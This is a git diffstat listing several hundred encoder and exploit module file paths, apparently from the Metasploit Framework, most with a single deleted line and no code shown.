modules/encoders/ppc/longxor.rb | 1 - modules/encoders/ppc/longxor_tag.rb | 1 - modules/encoders/sparc/longxor_tag.rb | 1 - modules/encoders/x64/xor.rb | 1 - modules/encoders/x86/alpha_mixed.rb | 1 - modules/encoders/x86/alpha_upper.rb | 1 - modules/encoders/x86/avoid_underscore_tolower.rb | 1 - modules/encoders/x86/avoid_utf8_tolower.rb | 1 - modules/encoders/x86/call4_dword_xor.rb | 1 - modules/encoders/x86/context_cpuid.rb | 1 - modules/encoders/x86/context_stat.rb | 1 - modules/encoders/x86/context_time.rb | 1 - modules/encoders/x86/countdown.rb | 1 - modules/encoders/x86/fnstenv_mov.rb | 1 - modules/encoders/x86/jmp_call_additive.rb | 1 - modules/encoders/x86/nonalpha.rb | 1 - modules/encoders/x86/nonupper.rb | 1 - modules/encoders/x86/shikata_ga_nai.rb | 1 - modules/encoders/x86/single_static_bit.rb | 1 - modules/encoders/x86/unicode_mixed.rb | 1 - modules/encoders/x86/unicode_upper.rb | 1 - modules/exploits/aix/rpc_cmsd_opcode21.rb | 1 - modules/exploits/aix/rpc_ttdbserverd_realpath.rb | 1 - modules/exploits/apple_ios/browser/safari_libtiff.rb | 1 - modules/exploits/apple_ios/email/mobilemail_libtiff.rb | 1 - modules/exploits/bsdi/softcart/mercantec_softcart.rb | 1 - modules/exploits/dialup/multi/login/manyargs.rb | 1 - modules/exploits/freebsd/ftp/proftp_telnet_iac.rb | 1 - modules/exploits/freebsd/samba/trans2open.rb | 1 - modules/exploits/freebsd/tacacs/xtacacsd_report.rb | 1 - modules/exploits/hpux/lpd/cleanup_exec.rb | 1 - modules/exploits/irix/lpd/tagprinter_exec.rb | 1 - modules/exploits/linux/ftp/proftp_sreplace.rb | 1 - modules/exploits/linux/ftp/proftp_telnet_iac.rb | 1 - modules/exploits/linux/games/ut2004_secure.rb | 1 - modules/exploits/linux/http/alcatel_omnipcx_mastercgi_exec.rb | 1 - modules/exploits/linux/http/ddwrt_cgibin_exec.rb | 1 - modules/exploits/linux/http/gpsd_format_string.rb | 1 - modules/exploits/linux/http/linksys_apply_cgi.rb | 1 - modules/exploits/linux/http/peercast_url.rb | 1 - modules/exploits/linux/http/piranha_passwd_exec.rb | 1 - modules/exploits/linux/http/webid_converter.rb | 1 - modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb | 1 - modules/exploits/linux/ids/snortbopre.rb | 1 - modules/exploits/linux/imap/imap_uw_lsub.rb | 1 - modules/exploits/linux/madwifi/madwifi_giwscan_cb.rb | 1 - modules/exploits/linux/misc/accellion_fta_mpipe2.rb | 1 - modules/exploits/linux/misc/drb_remote_codeexec.rb | 1 - modules/exploits/linux/misc/gld_postfix.rb | 1 - modules/exploits/linux/misc/hplip_hpssd_exec.rb | 1 - modules/exploits/linux/misc/ib_inet_connect.rb | 1 - modules/exploits/linux/misc/ib_jrd8_create_database.rb | 1 - modules/exploits/linux/misc/ib_open_marker_file.rb | 1 - modules/exploits/linux/misc/ib_pwd_db_aliased.rb | 1 - modules/exploits/linux/misc/lprng_format_string.rb | 1 - modules/exploits/linux/misc/netsupport_manager_agent.rb | 1 - modules/exploits/linux/mysql/mysql_yassl_getname.rb | 1 - modules/exploits/linux/mysql/mysql_yassl_hello.rb | 1 - modules/exploits/linux/pop3/cyrus_pop3d_popsubfolders.rb | 1 - modules/exploits/linux/pptp/poptop_negative_read.rb | 1 - modules/exploits/linux/proxy/squid_ntlm_authenticate.rb | 1 - modules/exploits/linux/samba/chain_reply.rb | 1 - modules/exploits/linux/samba/lsa_transnames_heap.rb | 1 - modules/exploits/linux/samba/trans2open.rb | 1 - modules/exploits/linux/ssh/f5_bigip_known_privkey.rb | 1 - modules/exploits/multi/browser/firefox_escape_retval.rb | 1 - modules/exploits/multi/browser/firefox_queryinterface.rb | 1 - modules/exploits/multi/browser/itms_overflow.rb | 1 - modules/exploits/multi/browser/java_calendar_deserialize.rb | 1 - modules/exploits/multi/browser/java_getsoundbank_bof.rb | 1 - modules/exploits/multi/browser/java_rmi_connection_impl.rb | 1 - modules/exploits/multi/browser/java_setdifficm_bof.rb | 1 - modules/exploits/multi/browser/java_signed_applet.rb | 1 - modules/exploits/multi/browser/java_trusted_chain.rb | 1 - modules/exploits/multi/browser/mozilla_compareto.rb | 1 - modules/exploits/multi/browser/mozilla_navigatorjava.rb | 1 - modules/exploits/multi/browser/opera_configoverwrite.rb | 1 - modules/exploits/multi/browser/opera_historysearch.rb | 1 - modules/exploits/multi/browser/qtjava_pointer.rb | 1 - modules/exploits/multi/fileformat/adobe_u3d_meshcont.rb | 1 - modules/exploits/multi/fileformat/maple_maplet.rb | 1 - modules/exploits/multi/fileformat/peazip_command_injection.rb | 1 - modules/exploits/multi/ftp/wuftpd_site_exec_format.rb | 1 - modules/exploits/multi/handler.rb | 1 - modules/exploits/multi/http/freenas_exec_raw.rb | 1 - modules/exploits/multi/http/glassfish_deployer.rb | 1 - modules/exploits/multi/http/jboss_bshdeployer.rb | 1 - modules/exploits/multi/http/jboss_deploymentfilerepository.rb | 1 - modules/exploits/multi/http/jboss_maindeployer.rb | 1 - modules/exploits/multi/http/php_cgi_arg_injection.rb | 1 - modules/exploits/multi/http/phpldapadmin_query_engine.rb | 1 - modules/exploits/multi/http/phpmyadmin_3522_backdoor.rb | 1 - modules/exploits/multi/http/phpscheduleit_start_date.rb | 1 - modules/exploits/multi/http/snortreport_exec.rb | 1 - modules/exploits/multi/http/spree_search_exec.rb | 1 - modules/exploits/multi/http/spree_searchlogic_exec.rb | 1 - modules/exploits/multi/http/struts_code_exec.rb | 1 - .../exploits/multi/http/struts_code_exec_exception_delegator.rb | 1 - modules/exploits/multi/http/sun_jsws_dav_options.rb | 1 - modules/exploits/multi/http/tomcat_mgr_deploy.rb | 1 - modules/exploits/multi/misc/java_rmi_server.rb | 1 - modules/exploits/multi/misc/openview_omniback_exec.rb | 1 - modules/exploits/multi/misc/veritas_netbackup_cmdexec.rb | 1 - modules/exploits/multi/misc/wireshark_lwres_getaddrbyname.rb | 1 - .../exploits/multi/misc/wireshark_lwres_getaddrbyname_loop.rb | 1 - modules/exploits/multi/misc/zend_java_bridge.rb | 1 - modules/exploits/multi/ntp/ntp_overflow.rb | 1 - modules/exploits/multi/php/php_unserialize_zval_cookie.rb | 1 - modules/exploits/multi/realserver/describe.rb | 1 - modules/exploits/multi/samba/nttrans.rb | 1 - modules/exploits/multi/samba/usermap_script.rb | 1 - modules/exploits/multi/svn/svnserve_date.rb | 1 - modules/exploits/multi/wyse/hagent_untrusted_hsdata.rb | 1 - modules/exploits/netware/smb/lsass_cifs.rb | 1 - modules/exploits/netware/sunrpc/pkernel_callit.rb | 1 - modules/exploits/osx/afp/loginext.rb | 1 - modules/exploits/osx/arkeia/type77.rb | 1 - modules/exploits/osx/browser/safari_file_policy.rb | 1 - modules/exploits/osx/browser/safari_metadata_archive.rb | 1 - modules/exploits/osx/browser/software_update.rb | 1 - modules/exploits/osx/email/mailapp_image_exec.rb | 1 - modules/exploits/osx/ftp/webstar_ftp_user.rb | 1 - modules/exploits/osx/http/evocam_webserver.rb | 1 - modules/exploits/osx/mdns/upnp_location.rb | 1 - modules/exploits/osx/misc/ufo_ai.rb | 1 - modules/exploits/osx/rtsp/quicktime_rtsp_content_type.rb | 1 - modules/exploits/osx/samba/lsa_transnames_heap.rb | 1 - modules/exploits/osx/samba/trans2open.rb | 1 - modules/exploits/solaris/dtspcd/heap_noir.rb | 1 - modules/exploits/solaris/lpd/sendmail_exec.rb | 1 - modules/exploits/solaris/samba/lsa_transnames_heap.rb | 1 - modules/exploits/solaris/samba/trans2open.rb | 1 - modules/exploits/solaris/sunrpc/sadmind_adm_build_path.rb | 1 - modules/exploits/solaris/sunrpc/sadmind_exec.rb | 1 - modules/exploits/solaris/sunrpc/ypupdated_exec.rb | 1 - modules/exploits/solaris/telnet/fuser.rb | 1 - modules/exploits/solaris/telnet/ttyprompt.rb | 1 - modules/exploits/unix/ftp/proftpd_133c_backdoor.rb | 1 - modules/exploits/unix/ftp/vsftpd_234_backdoor.rb | 1 - modules/exploits/unix/http/contentkeeperweb_mimencode.rb | 1 - modules/exploits/unix/http/lifesize_room.rb | 1 - modules/exploits/unix/irc/unreal_ircd_3281_backdoor.rb | 1 - modules/exploits/unix/misc/distcc_exec.rb | 1 - modules/exploits/unix/misc/spamassassin_exec.rb | 1 - modules/exploits/unix/misc/zabbix_agent_exec.rb | 1 - modules/exploits/unix/smtp/clamav_milter_blackhole.rb | 1 - modules/exploits/unix/smtp/exim4_string_format.rb | 1 - modules/exploits/unix/webapp/awstats_configdir_exec.rb | 1 - modules/exploits/unix/webapp/awstats_migrate_exec.rb | 1 - modules/exploits/unix/webapp/awstatstotals_multisort.rb | 1 - modules/exploits/unix/webapp/barracuda_img_exec.rb | 1 - modules/exploits/unix/webapp/base_qry_common.rb | 1 - modules/exploits/unix/webapp/cacti_graphimage_exec.rb | 1 - modules/exploits/unix/webapp/cakephp_cache_corruption.rb | 1 - modules/exploits/unix/webapp/citrix_access_gateway_exec.rb | 1 - modules/exploits/unix/webapp/coppermine_piceditor.rb | 1 - modules/exploits/unix/webapp/dogfood_spell_exec.rb | 1 - modules/exploits/unix/webapp/generic_exec.rb | 1 - modules/exploits/unix/webapp/google_proxystylesheet_exec.rb | 1 - modules/exploits/unix/webapp/guestbook_ssi_exec.rb | 1 - modules/exploits/unix/webapp/joomla_tinybrowser.rb | 1 - modules/exploits/unix/webapp/mambo_cache_lite.rb | 1 - modules/exploits/unix/webapp/mitel_awc_exec.rb | 1 - modules/exploits/unix/webapp/mybb_backdoor.rb | 1 - modules/exploits/unix/webapp/nagios3_statuswml_ping.rb | 1 - modules/exploits/unix/webapp/openview_connectednodes_exec.rb | 1 - modules/exploits/unix/webapp/openx_banner_edit.rb | 1 - modules/exploits/unix/webapp/oracle_vm_agent_utl.rb | 1 - modules/exploits/unix/webapp/oscommerce_filemanager.rb | 1 - modules/exploits/unix/webapp/pajax_remote_exec.rb | 1 - modules/exploits/unix/webapp/php_eval.rb | 1 - modules/exploits/unix/webapp/php_vbulletin_template.rb | 1 - modules/exploits/unix/webapp/php_wordpress_foxypress.rb | 1 - modules/exploits/unix/webapp/php_wordpress_lastpost.rb | 1 - modules/exploits/unix/webapp/php_xmlrpc_eval.rb | 1 - modules/exploits/unix/webapp/phpbb_highlight.rb | 1 - modules/exploits/unix/webapp/phpmyadmin_config.rb | 1 - modules/exploits/unix/webapp/qtss_parse_xml_exec.rb | 1 - modules/exploits/unix/webapp/redmine_scm_exec.rb | 1 - modules/exploits/unix/webapp/sphpblog_file_upload.rb | 1 - modules/exploits/unix/webapp/squirrelmail_pgp_plugin.rb | 1 - modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb | 1 - modules/exploits/unix/webapp/tikiwiki_graph_formula_exec.rb | 1 - modules/exploits/unix/webapp/tikiwiki_jhot_exec.rb | 1 - modules/exploits/unix/webapp/tikiwiki_unserialize_exec.rb | 1 - modules/exploits/unix/webapp/trixbox_langchoice.rb | 1 - modules/exploits/unix/webapp/twiki_history.rb | 1 - modules/exploits/unix/webapp/twiki_search.rb | 1 - modules/exploits/windows/antivirus/ams_hndlrsvc.rb | 1 - modules/exploits/windows/antivirus/ams_xfr.rb | 1 - modules/exploits/windows/antivirus/symantec_iao.rb | 1 - modules/exploits/windows/antivirus/symantec_rtvscan.rb | 1 - modules/exploits/windows/antivirus/trendmicro_serverprotect.rb | 1 - .../windows/antivirus/trendmicro_serverprotect_createbinding.rb | 1 - .../windows/antivirus/trendmicro_serverprotect_earthagent.rb | 1 - modules/exploits/windows/arkeia/type77.rb | 1 - modules/exploits/windows/backdoor/energizer_duo_payload.rb | 1 - modules/exploits/windows/backupexec/name_service.rb | 1 - modules/exploits/windows/backupexec/remote_agent.rb | 1 - modules/exploits/windows/brightstor/ca_arcserve_342.rb | 1 - modules/exploits/windows/brightstor/discovery_tcp.rb | 1 - modules/exploits/windows/brightstor/discovery_udp.rb | 1 - modules/exploits/windows/brightstor/etrust_itm_alert.rb | 1 - modules/exploits/windows/brightstor/hsmserver.rb | 1 - modules/exploits/windows/brightstor/lgserver.rb | 1 - modules/exploits/windows/brightstor/lgserver_multi.rb | 1 - modules/exploits/windows/brightstor/lgserver_rxrlogin.rb | 1 - .../brightstor/lgserver_rxssetdatagrowthscheduleandfilter.rb | 1 - .../exploits/windows/brightstor/lgserver_rxsuselicenseini.rb | 1 - modules/exploits/windows/brightstor/license_gcr.rb | 1 - modules/exploits/windows/brightstor/mediasrv_sunrpc.rb | 1 - modules/exploits/windows/brightstor/message_engine.rb | 1 - modules/exploits/windows/brightstor/message_engine_72.rb | 1 - modules/exploits/windows/brightstor/message_engine_heap.rb | 1 - modules/exploits/windows/brightstor/sql_agent.rb | 1 - modules/exploits/windows/brightstor/tape_engine.rb | 1 - modules/exploits/windows/brightstor/tape_engine_8A.rb | 1 - modules/exploits/windows/brightstor/universal_agent.rb | 1 - modules/exploits/windows/browser/adobe_cooltype_sing.rb | 1 - .../exploits/windows/browser/adobe_flashplayer_arrayindexing.rb | 1 - modules/exploits/windows/browser/adobe_flashplayer_avm.rb | 1 - modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb | 1 - .../exploits/windows/browser/adobe_flashplayer_newfunction.rb | 1 - .../exploits/windows/browser/adobe_flatedecode_predictor02.rb | 1 - modules/exploits/windows/browser/adobe_geticon.rb | 1 - modules/exploits/windows/browser/adobe_jbig2decode.rb | 1 - modules/exploits/windows/browser/adobe_media_newplayer.rb | 1 - .../exploits/windows/browser/adobe_shockwave_rcsl_corruption.rb | 1 - modules/exploits/windows/browser/adobe_utilprintf.rb | 1 - modules/exploits/windows/browser/aim_goaway.rb | 1 - modules/exploits/windows/browser/amaya_bdo.rb | 1 - modules/exploits/windows/browser/aol_ampx_convertfile.rb | 1 - modules/exploits/windows/browser/aol_icq_downloadagent.rb | 1 - modules/exploits/windows/browser/apple_itunes_playlist.rb | 1 - .../exploits/windows/browser/apple_quicktime_marshaled_punk.rb | 1 - modules/exploits/windows/browser/apple_quicktime_rtsp.rb | 1 - modules/exploits/windows/browser/apple_quicktime_smil_debug.rb | 1 - modules/exploits/windows/browser/ask_shortformat.rb | 1 - .../exploits/windows/browser/athocgov_completeinstallation.rb | 1 - modules/exploits/windows/browser/autodesk_idrop.rb | 1 - modules/exploits/windows/browser/aventail_epi_activex.rb | 1 - modules/exploits/windows/browser/awingsoft_web3d_bof.rb | 1 - modules/exploits/windows/browser/awingsoft_winds3d_sceneurl.rb | 1 - .../windows/browser/baofeng_storm_onbeforevideodownload.rb | 1 - modules/exploits/windows/browser/barcode_ax49.rb | 1 - .../exploits/windows/browser/blackice_downloadimagefileurl.rb | 1 - modules/exploits/windows/browser/ca_brightstor_addcolumn.rb | 1 - modules/exploits/windows/browser/chilkat_crypt_writefile.rb | 1 - modules/exploits/windows/browser/cisco_anyconnect_exec.rb | 1 - modules/exploits/windows/browser/citrix_gateway_actx.rb | 1 - modules/exploits/windows/browser/communicrypt_mail_activex.rb | 1 - .../exploits/windows/browser/creative_software_cachefolder.rb | 1 - modules/exploits/windows/browser/dxstudio_player_exec.rb | 1 - modules/exploits/windows/browser/ea_checkrequirements.rb | 1 - .../exploits/windows/browser/ebook_flipviewer_fviewerloading.rb | 1 - modules/exploits/windows/browser/enjoysapgui_comp_download.rb | 1 - .../exploits/windows/browser/enjoysapgui_preparetoposthtml.rb | 1 - modules/exploits/windows/browser/facebook_extractiptc.rb | 1 - modules/exploits/windows/browser/gom_openurl.rb | 1 - modules/exploits/windows/browser/greendam_url.rb | 1 - .../windows/browser/hp_easy_printer_care_xmlsimpleaccessor.rb | 1 - modules/exploits/windows/browser/hp_loadrunner_addfile.rb | 1 - modules/exploits/windows/browser/hp_loadrunner_addfolder.rb | 1 - modules/exploits/windows/browser/hpmqc_progcolor.rb | 1 - modules/exploits/windows/browser/hyleos_chemviewx_activex.rb | 1 - modules/exploits/windows/browser/ibmegath_getxmlvalue.rb | 2 -- .../exploits/windows/browser/ibmlotusdomino_dwa_uploadmodule.rb | 1 - modules/exploits/windows/browser/ie_createobject.rb | 1 - modules/exploits/windows/browser/ie_iscomponentinstalled.rb | 1 - modules/exploits/windows/browser/ie_unsafe_scripting.rb | 1 - .../exploits/windows/browser/imgeviewer_tifmergemultifiles.rb | 1 - modules/exploits/windows/browser/java_basicservice_impl.rb | 1 - modules/exploits/windows/browser/java_codebase_trust.rb | 1 - modules/exploits/windows/browser/java_docbase_bof.rb | 1 - modules/exploits/windows/browser/java_ws_arginject_altjvm.rb | 1 - modules/exploits/windows/browser/java_ws_vmargs.rb | 1 - modules/exploits/windows/browser/juniper_sslvpn_ive_setupdll.rb | 1 - modules/exploits/windows/browser/kazaa_altnet_heap.rb | 1 - modules/exploits/windows/browser/logitechvideocall_start.rb | 1 - modules/exploits/windows/browser/lpviewer_url.rb | 1 - .../exploits/windows/browser/macrovision_downloadandexecute.rb | 1 - modules/exploits/windows/browser/macrovision_unsafe.rb | 1 - modules/exploits/windows/browser/mcafee_mcsubmgr_vsprintf.rb | 1 - .../exploits/windows/browser/mcafeevisualtrace_tracetarget.rb | 1 - modules/exploits/windows/browser/mirc_irc_url.rb | 1 - modules/exploits/windows/browser/mozilla_interleaved_write.rb | 1 - modules/exploits/windows/browser/mozilla_mchannel.rb | 1 - modules/exploits/windows/browser/mozilla_nstreerange.rb | 1 - modules/exploits/windows/browser/mozilla_reduceright.rb | 1 - modules/exploits/windows/browser/ms03_020_ie_objecttype.rb | 1 - modules/exploits/windows/browser/ms06_001_wmf_setabortproc.rb | 1 - modules/exploits/windows/browser/ms06_013_createtextrange.rb | 1 - modules/exploits/windows/browser/ms06_055_vml_method.rb | 1 - modules/exploits/windows/browser/ms06_057_webview_setslice.rb | 1 - modules/exploits/windows/browser/ms06_067_keyframe.rb | 1 - modules/exploits/windows/browser/ms06_071_xml_core.rb | 1 - .../windows/browser/ms07_017_ani_loadimage_chunksize.rb | 1 - modules/exploits/windows/browser/ms08_041_snapshotviewer.rb | 1 - modules/exploits/windows/browser/ms08_053_mediaencoder.rb | 1 - .../exploits/windows/browser/ms08_070_visual_studio_msmask.rb | 1 - modules/exploits/windows/browser/ms08_078_xml_corruption.rb | 1 - modules/exploits/windows/browser/ms09_002_memory_corruption.rb | 1 - modules/exploits/windows/browser/ms09_043_owc_htmlurl.rb | 1 - modules/exploits/windows/browser/ms09_043_owc_msdso.rb | 1 - modules/exploits/windows/browser/ms09_072_style_object.rb | 1 - modules/exploits/windows/browser/ms10_002_aurora.rb | 1 - modules/exploits/windows/browser/ms10_018_ie_behaviors.rb | 1 - modules/exploits/windows/browser/ms10_018_ie_tabular_activex.rb | 1 - .../exploits/windows/browser/ms10_022_ie_vbscript_winhlp32.rb | 1 - modules/exploits/windows/browser/ms10_026_avi_nsamplespersec.rb | 1 - .../exploits/windows/browser/ms10_042_helpctr_xss_cmd_exec.rb | 1 - .../windows/browser/ms10_046_shortcut_icon_dllloader.rb | 1 - modules/exploits/windows/browser/ms10_090_ie_css_clip.rb | 1 - modules/exploits/windows/browser/ms11_003_ie_css_import.rb | 1 - modules/exploits/windows/browser/msvidctl_mpeg2.rb | 1 - modules/exploits/windows/browser/mswhale_checkforupdates.rb | 1 - .../windows/browser/nctaudiofile2_setformatlikesample.rb | 1 - modules/exploits/windows/browser/nis2004_antispam.rb | 1 - modules/exploits/windows/browser/nis2004_get.rb | 1 - modules/exploits/windows/browser/novelliprint_callbackurl.rb | 1 - modules/exploits/windows/browser/novelliprint_datetime.rb | 1 - modules/exploits/windows/browser/novelliprint_executerequest.rb | 1 - .../exploits/windows/browser/novelliprint_executerequest_dbg.rb | 1 - .../exploits/windows/browser/novelliprint_getdriversettings.rb | 1 - .../windows/browser/novelliprint_getdriversettings_2.rb | 1 - modules/exploits/windows/browser/novelliprint_target_frame.rb | 1 - modules/exploits/windows/browser/oracle_dc_submittoexpress.rb | 1 - modules/exploits/windows/browser/orbit_connecting.rb | 1 - modules/exploits/windows/browser/pcvue_func.rb | 1 - modules/exploits/windows/browser/persits_xupload_traversal.rb | 1 - modules/exploits/windows/browser/real_arcade_installerdlg.rb | 1 - modules/exploits/windows/browser/realplayer_cdda_uri.rb | 1 - modules/exploits/windows/browser/realplayer_console.rb | 1 - modules/exploits/windows/browser/realplayer_import.rb | 1 - modules/exploits/windows/browser/realplayer_qcp.rb | 1 - modules/exploits/windows/browser/realplayer_smil.rb | 1 - modules/exploits/windows/browser/roxio_cineplayer.rb | 1 - modules/exploits/windows/browser/safari_xslt_output.rb | 1 - .../exploits/windows/browser/sapgui_saveviewtosessionfile.rb | 1 - modules/exploits/windows/browser/softartisans_getdrivename.rb | 1 - modules/exploits/windows/browser/sonicwall_addrouteentry.rb | 1 - .../browser/symantec_altirisdeployment_downloadandinstall.rb | 1 - .../windows/browser/symantec_altirisdeployment_runcmd.rb | 1 - modules/exploits/windows/browser/symantec_appstream_unsafe.rb | 1 - .../exploits/windows/browser/symantec_backupexec_pvcalendar.rb | 1 - .../browser/symantec_consoleutilities_browseandsavefile.rb | 1 - .../exploits/windows/browser/systemrequirementslab_unsafe.rb | 1 - modules/exploits/windows/browser/teechart_pro.rb | 1 - modules/exploits/windows/browser/trendmicro_extsetowner.rb | 1 - modules/exploits/windows/browser/trendmicro_officescan.rb | 1 - modules/exploits/windows/browser/tumbleweed_filetransfer.rb | 1 - modules/exploits/windows/browser/ultraoffice_httpupload.rb | 1 - modules/exploits/windows/browser/verypdf_pdfview.rb | 1 - modules/exploits/windows/browser/viscom_movieplayer_drawtext.rb | 1 - modules/exploits/windows/browser/vlc_amv.rb | 1 - modules/exploits/windows/browser/webdav_dll_hijacker.rb | 1 - modules/exploits/windows/browser/webex_ucf_newobject.rb | 1 - modules/exploits/windows/browser/winamp_playlist_unc.rb | 1 - modules/exploits/windows/browser/winamp_ultravox.rb | 1 - modules/exploits/windows/browser/windvd7_applicationtype.rb | 1 - modules/exploits/windows/browser/winzip_fileview.rb | 1 - modules/exploits/windows/browser/wmi_admintools.rb | 1 - modules/exploits/windows/browser/xmplay_asx.rb | 1 - modules/exploits/windows/browser/yahoomessenger_fvcom.rb | 1 - modules/exploits/windows/browser/yahoomessenger_server.rb | 1 - .../exploits/windows/browser/zenturiprogramchecker_unsafe.rb | 1 - modules/exploits/windows/dcerpc/ms03_026_dcom.rb | 1 - modules/exploits/windows/dcerpc/ms05_017_msmq.rb | 1 - modules/exploits/windows/dcerpc/ms07_029_msdns_zonename.rb | 1 - modules/exploits/windows/dcerpc/ms07_065_msmq.rb | 1 - modules/exploits/windows/driver/broadcom_wifi_ssid.rb | 1 - modules/exploits/windows/driver/dlink_wifi_rates.rb | 1 - modules/exploits/windows/driver/netgear_wg111_beacon.rb | 1 - .../exploits/windows/email/ms07_017_ani_loadimage_chunksize.rb | 1 - modules/exploits/windows/email/ms10_045_outlook_ref_only.rb | 1 - modules/exploits/windows/email/ms10_045_outlook_ref_resolve.rb | 1 - modules/exploits/windows/emc/alphastor_agent.rb | 1 - modules/exploits/windows/fileformat/a-pdf_wav_to_mp3.rb | 1 - modules/exploits/windows/fileformat/acdsee_fotoslate_string.rb | 1 - modules/exploits/windows/fileformat/acdsee_xpm.rb | 1 - modules/exploits/windows/fileformat/activepdf_webgrabber.rb | 1 - modules/exploits/windows/fileformat/adobe_collectemailinfo.rb | 1 - modules/exploits/windows/fileformat/adobe_cooltype_sing.rb | 1 - modules/exploits/windows/fileformat/adobe_flashplayer_button.rb | 1 - .../windows/fileformat/adobe_flashplayer_newfunction.rb | 1 - .../windows/fileformat/adobe_flatedecode_predictor02.rb | 1 - modules/exploits/windows/fileformat/adobe_geticon.rb | 1 - .../exploits/windows/fileformat/adobe_illustrator_v14_eps.rb | 1 - modules/exploits/windows/fileformat/adobe_jbig2decode.rb | 1 - modules/exploits/windows/fileformat/adobe_libtiff.rb | 1 - modules/exploits/windows/fileformat/adobe_media_newplayer.rb | 1 - modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb | 1 - .../exploits/windows/fileformat/adobe_pdf_embedded_exe_nojs.rb | 1 - modules/exploits/windows/fileformat/adobe_u3d_meshdecl.rb | 1 - modules/exploits/windows/fileformat/adobe_utilprintf.rb | 1 - modules/exploits/windows/fileformat/altap_salamander_pdb.rb | 1 - modules/exploits/windows/fileformat/aol_desktop_linktag.rb | 1 - modules/exploits/windows/fileformat/aol_phobos_bof.rb | 1 - modules/exploits/windows/fileformat/apple_quicktime_pnsize.rb | 1 - modules/exploits/windows/fileformat/audio_wkstn_pls.rb | 1 - modules/exploits/windows/fileformat/audiotran_pls.rb | 1 - modules/exploits/windows/fileformat/bacnet_csv.rb | 1 - modules/exploits/windows/fileformat/blazedvd_plf.rb | 1 - modules/exploits/windows/fileformat/ca_cab.rb | 1 - modules/exploits/windows/fileformat/cain_abel_4918_rdp.rb | 1 - modules/exploits/windows/fileformat/csound_getnum_bof.rb | 1 - modules/exploits/windows/fileformat/cytel_studio_cy3.rb | 1 - modules/exploits/windows/fileformat/deepburner_path.rb | 1 - modules/exploits/windows/fileformat/destinymediaplayer16.rb | 1 - modules/exploits/windows/fileformat/digital_music_pad_pls.rb | 1 - modules/exploits/windows/fileformat/djvu_imageurl.rb | 1 - modules/exploits/windows/fileformat/dvdx_plf_bof.rb | 1 - modules/exploits/windows/fileformat/emc_appextender_keyworks.rb | 1 - .../exploits/windows/fileformat/esignal_styletemplate_bof.rb | 1 - modules/exploits/windows/fileformat/etrust_pestscan.rb | 1 - modules/exploits/windows/fileformat/ezip_wizard_bof.rb | 1 - modules/exploits/windows/fileformat/fatplayer_wav.rb | 1 - modules/exploits/windows/fileformat/fdm_torrent.rb | 1 - modules/exploits/windows/fileformat/feeddemon_opml.rb | 1 - modules/exploits/windows/fileformat/foxit_reader_filewrite.rb | 1 - modules/exploits/windows/fileformat/foxit_reader_launch.rb | 1 - modules/exploits/windows/fileformat/foxit_title_bof.rb | 1 - modules/exploits/windows/fileformat/galan_fileformat_bof.rb | 1 - modules/exploits/windows/fileformat/gta_samp.rb | 1 - modules/exploits/windows/fileformat/hhw_hhp_compiledfile_bof.rb | 1 - modules/exploits/windows/fileformat/hhw_hhp_contentfile_bof.rb | 1 - modules/exploits/windows/fileformat/hhw_hhp_indexfile_bof.rb | 1 - modules/exploits/windows/fileformat/ht_mp3player_ht3_bof.rb | 1 - modules/exploits/windows/fileformat/ideal_migration_ipj.rb | 1 - modules/exploits/windows/fileformat/irfanview_jpeg2000_bof.rb | 1 - modules/exploits/windows/fileformat/lotusnotes_lzh.rb | 1 - modules/exploits/windows/fileformat/magix_musikmaker_16_mmm.rb | 1 - .../windows/fileformat/mcafee_hercules_deletesnapshot.rb | 1 - modules/exploits/windows/fileformat/mediajukebox.rb | 1 - modules/exploits/windows/fileformat/microp_mppl.rb | 1 - modules/exploits/windows/fileformat/millenium_mp3_pls.rb | 1 - modules/exploits/windows/fileformat/mini_stream_pls_bof.rb | 1 - modules/exploits/windows/fileformat/mjm_coreplayer2011_s3m.rb | 1 - modules/exploits/windows/fileformat/mjm_quickplayer_s3m.rb | 1 - modules/exploits/windows/fileformat/moxa_mediadbplayback.rb | 1 - modules/exploits/windows/fileformat/mplayer_sami_bof.rb | 1 - .../exploits/windows/fileformat/ms09_067_excel_featheader.rb | 1 - modules/exploits/windows/fileformat/ms10_004_textbytesatom.rb | 1 - .../exploits/windows/fileformat/ms10_087_rtf_pfragments_bof.rb | 1 - .../windows/fileformat/ms11_006_createsizeddibsection.rb | 1 - modules/exploits/windows/fileformat/ms11_021_xlb_bof.rb | 1 - modules/exploits/windows/fileformat/ms_visual_basic_vbp.rb | 1 - .../exploits/windows/fileformat/msworks_wkspictureinterface.rb | 1 - modules/exploits/windows/fileformat/mymp3player_m3u.rb | 1 - .../exploits/windows/fileformat/nuance_pdf_launch_overflow.rb | 1 - modules/exploits/windows/fileformat/orbital_viewer_orb.rb | 1 - modules/exploits/windows/fileformat/proshow_cellimage_bof.rb | 1 - modules/exploits/windows/fileformat/real_networks_netzip_bof.rb | 1 - .../exploits/windows/fileformat/safenet_softremote_groupname.rb | 1 - modules/exploits/windows/fileformat/sascam_get.rb | 1 - modules/exploits/windows/fileformat/scadaphone_zip.rb | 1 - modules/exploits/windows/fileformat/somplplayer_m3u.rb | 1 - .../exploits/windows/fileformat/subtitle_processor_m3u_bof.rb | 1 - modules/exploits/windows/fileformat/tugzip.rb | 1 - modules/exploits/windows/fileformat/ultraiso_ccd.rb | 1 - modules/exploits/windows/fileformat/ultraiso_cue.rb | 1 - modules/exploits/windows/fileformat/ursoft_w32dasm.rb | 1 - modules/exploits/windows/fileformat/varicad_dwb.rb | 1 - modules/exploits/windows/fileformat/videolan_tivo.rb | 1 - modules/exploits/windows/fileformat/videospirit_visprj.rb | 1 - modules/exploits/windows/fileformat/visio_dxf_bof.rb | 1 - modules/exploits/windows/fileformat/visiwave_vwr_type.rb | 1 - modules/exploits/windows/fileformat/vlc_modplug_s3m.rb | 1 - modules/exploits/windows/fileformat/vlc_realtext.rb | 1 - modules/exploits/windows/fileformat/vlc_smb_uri.rb | 1 - modules/exploits/windows/fileformat/vlc_webm.rb | 1 - modules/exploits/windows/fileformat/vuplayer_cue.rb | 1 - modules/exploits/windows/fileformat/vuplayer_m3u.rb | 1 - modules/exploits/windows/fileformat/wireshark_packet_dect.rb | 1 - modules/exploits/windows/fileformat/wm_downloader_m3u.rb | 1 - modules/exploits/windows/fileformat/xenorate_xpl_bof.rb | 1 - modules/exploits/windows/fileformat/xion_m3u_sehbof.rb | 1 - modules/exploits/windows/fileformat/zinfaudioplayer221_pls.rb | 1 - 